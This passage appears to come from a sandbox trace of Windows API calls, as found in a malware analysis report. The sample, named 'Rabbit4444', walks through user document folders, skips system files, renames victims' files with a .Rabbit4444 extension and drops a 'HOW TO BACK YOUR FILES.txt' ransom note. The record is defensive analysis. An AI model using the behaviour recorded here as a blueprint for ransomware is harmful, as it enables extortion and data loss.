Flags=0x8, Size=0x208) returned 0x10c928 [0049.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.776] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14108672099) returned 1 [0049.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0049.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0049.776] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.777] CloseHandle (hObject=0x298) returned 1 [0049.777] CloseHandle (hObject=0x278) returned 1 [0049.777] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\r c_-ee.xls.Rabbit4444") returned 86 [0049.777] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\r c_-ee.xls" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\r c_-ee.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\r c_-ee.xls.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\r c_-ee.xls.rabbit4444"), dwFlags=0x1) returned 1 [0049.778] InterlockedExchangeAdd (in: Addend=0xff618, Value=43984 | out: Addend=0xff618) returned 23278112 [0049.778] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3692 [0049.778] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x259f4d70, ftCreationTime.dwHighDateTime=0x1d4c9ce, ftLastAccessTime.dwLowDateTime=0x6faf27a0, ftLastAccessTime.dwHighDateTime=0x1d4d4eb, ftLastWriteTime.dwLowDateTime=0x6faf27a0, ftLastWriteTime.dwHighDateTime=0x1d4d4eb, nFileSizeHigh=0x0, nFileSizeLow=0xabc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r c_-ee.xls", cAlternateFileName="RC_-EE~1.XLS")) returned 0 [0049.778] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0049.778] lstrcpyW (in: lpString1=0x130ebb8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.778] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.778] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.778] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.779] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.779] CloseHandle (hObject=0x278) returned 1 [0049.779] CloseHandle (hObject=0x27c) returned 1 [0049.780] GetCurrentThreadId () returned 0xd98 [0049.780] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6430 [0049.780] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0049.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10d3f8 | out: hHeap=0xe0000) returned 1 [0049.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6428 | out: hHeap=0xe0000) returned 1 [0049.780] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0049.780] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" [0049.780] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\.BFC0E91B00AE8A0620D3" [0049.780] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.782] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.784] FlushFileBuffers (hFile=0x27c) returned 1 [0049.786] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.786] CloseHandle (hObject=0x27c) returned 1 [0049.786] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned 39 [0049.786] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.786] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xddc1fe1e, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xe6ffd31f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0049.787] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.787] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.787] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.787] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.787] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xddc1fe1e, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xe6ffd31f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.787] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.787] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.787] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.787] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.787] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.787] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6ffd31f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6ffd31f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6ffd31f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.787] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.787] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.787] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddbf9d33, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="Rabbit4444.exe") returned -1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2=".") returned 1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="..") returned 1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="windows") returned -1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="bootmgr") returned 1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="pagefile.sys") returned -1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="boot") returned 1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="ids.txt") returned 1 [0049.787] lstrcmpiW (lpString1="kkcie@kdj.kd.pst", lpString2="NTUSER.DAT") returned -1 [0049.787] lstrcpyW (in: lpString1=0x130eb88, lpString2="kkcie@kdj.kd.pst" | out: lpString1="kkcie@kdj.kd.pst") returned="kkcie@kdj.kd.pst" [0049.787] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", dwFileAttributes=0x2000) returned 1 [0049.788] lstrlenW (lpString="kkcie@kdj.kd.pst") returned 16 [0049.788] lstrlenW (lpString="Rabbit4444") returned 10 [0049.788] lstrcmpiW (lpString1="kdj.kd.pst", lpString2="Rabbit4444") returned -1 [0049.788] lstrlenW (lpString=".dll") returned 4 [0049.788] lstrcmpiW (lpString1=".pst", lpString2=".dll") returned 1 [0049.788] lstrlenW (lpString=".lnk") returned 4 [0049.788] lstrcmpiW (lpString1=".pst", lpString2=".lnk") returned 1 [0049.788] lstrlenW (lpString=".ini") returned 4 [0049.788] lstrcmpiW (lpString1=".pst", lpString2=".ini") returned 1 [0049.788] lstrlenW (lpString=".sys") returned 4 [0049.788] lstrcmpiW (lpString1=".pst", lpString2=".sys") returned -1 [0049.788] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.788] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.788] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14109905552) returned 1 [0049.788] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=271360) returned 1 [0049.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0049.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0049.788] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x42700, lpName=0x0) returned 0x298 [0049.789] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42700) returned 0x70000 [0049.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.798] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.799] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14110958160) returned 1 [0049.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0049.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0049.799] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.801] CloseHandle (hObject=0x298) returned 1 [0049.801] CloseHandle (hObject=0x278) returned 1 [0049.802] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.Rabbit4444") returned 67 [0049.802] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst.rabbit4444"), dwFlags=0x1) returned 1 [0049.802] InterlockedExchangeAdd (in: Addend=0xff618, Value=271360 | out: Addend=0xff618) returned 23322096 [0049.802] InterlockedExchangeAdd (in: Addend=0xff624, Value=10 | out: Addend=0xff624) returned 3693 [0049.802] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddbf9d33, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 0 [0049.802] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0049.802] lstrcpyW (in: lpString1=0x130eb88, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.802] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.804] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.804] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.805] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.805] CloseHandle (hObject=0x278) returned 1 [0049.805] CloseHandle (hObject=0x27c) returned 1 [0049.806] GetCurrentThreadId () returned 0xd98 [0049.806] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0049.806] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\My Shapes", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes" [0049.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b510 | out: hHeap=0xe0000) returned 1 [0049.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0049.806] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\My Shapes" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes" [0049.806] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\" [0049.806] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\.BFC0E91B00AE8A0620D3" [0049.806] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.810] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.813] FlushFileBuffers (hFile=0x27c) returned 1 [0049.814] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.814] CloseHandle (hObject=0x27c) returned 1 [0049.814] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\My Shapes") returned 35 [0049.814] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.814] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xe7023508, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0049.814] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.814] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.815] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.815] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.815] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xe7023508, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.815] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.815] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.815] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.815] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.815] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.815] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe7023508, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe7023508, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe704974f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.815] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.815] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.815] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0049.815] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0049.815] lstrcpyW (in: lpString1=0x130eb80, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0049.815] lstrlenW (lpString="desktop.ini") returned 11 [0049.815] lstrlenW (lpString="Rabbit4444") returned 10 [0049.815] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0049.815] lstrlenW (lpString=".dll") returned 4 [0049.815] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0049.815] lstrlenW (lpString=".lnk") returned 4 [0049.815] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0049.815] lstrlenW (lpString=".ini") returned 4 [0049.815] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0049.815] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1a0f60e, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1a0f60e, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vssx", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2="Rabbit4444.exe") returned -1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2=".") returned 1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2="..") returned 1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2="windows") returned -1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2="bootmgr") returned 1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2="pagefile.sys") returned -1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2="boot") returned 1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2="ids.txt") returned -1 [0049.816] lstrcmpiW (lpString1="Favorites.vssx", lpString2="NTUSER.DAT") returned -1 [0049.816] lstrcpyW (in: lpString1=0x130eb80, lpString2="Favorites.vssx" | out: lpString1="Favorites.vssx") returned="Favorites.vssx" [0049.816] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx", dwFileAttributes=0x0) returned 1 [0049.816] lstrlenW (lpString="Favorites.vssx") returned 14 [0049.816] lstrlenW (lpString="Rabbit4444") returned 10 [0049.816] lstrcmpiW (lpString1="rites.vssx", lpString2="Rabbit4444") returned 1 [0049.816] lstrlenW (lpString=".dll") returned 4 [0049.816] lstrcmpiW (lpString1="vssx", lpString2=".dll") returned 1 [0049.816] lstrlenW (lpString=".lnk") returned 4 [0049.816] lstrcmpiW (lpString1="vssx", lpString2=".lnk") returned 1 [0049.816] lstrlenW (lpString=".ini") returned 4 [0049.816] lstrcmpiW (lpString1="vssx", lpString2=".ini") returned 1 [0049.816] lstrlenW (lpString=".sys") returned 4 [0049.816] lstrcmpiW (lpString1="vssx", lpString2=".sys") returned 1 [0049.816] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, 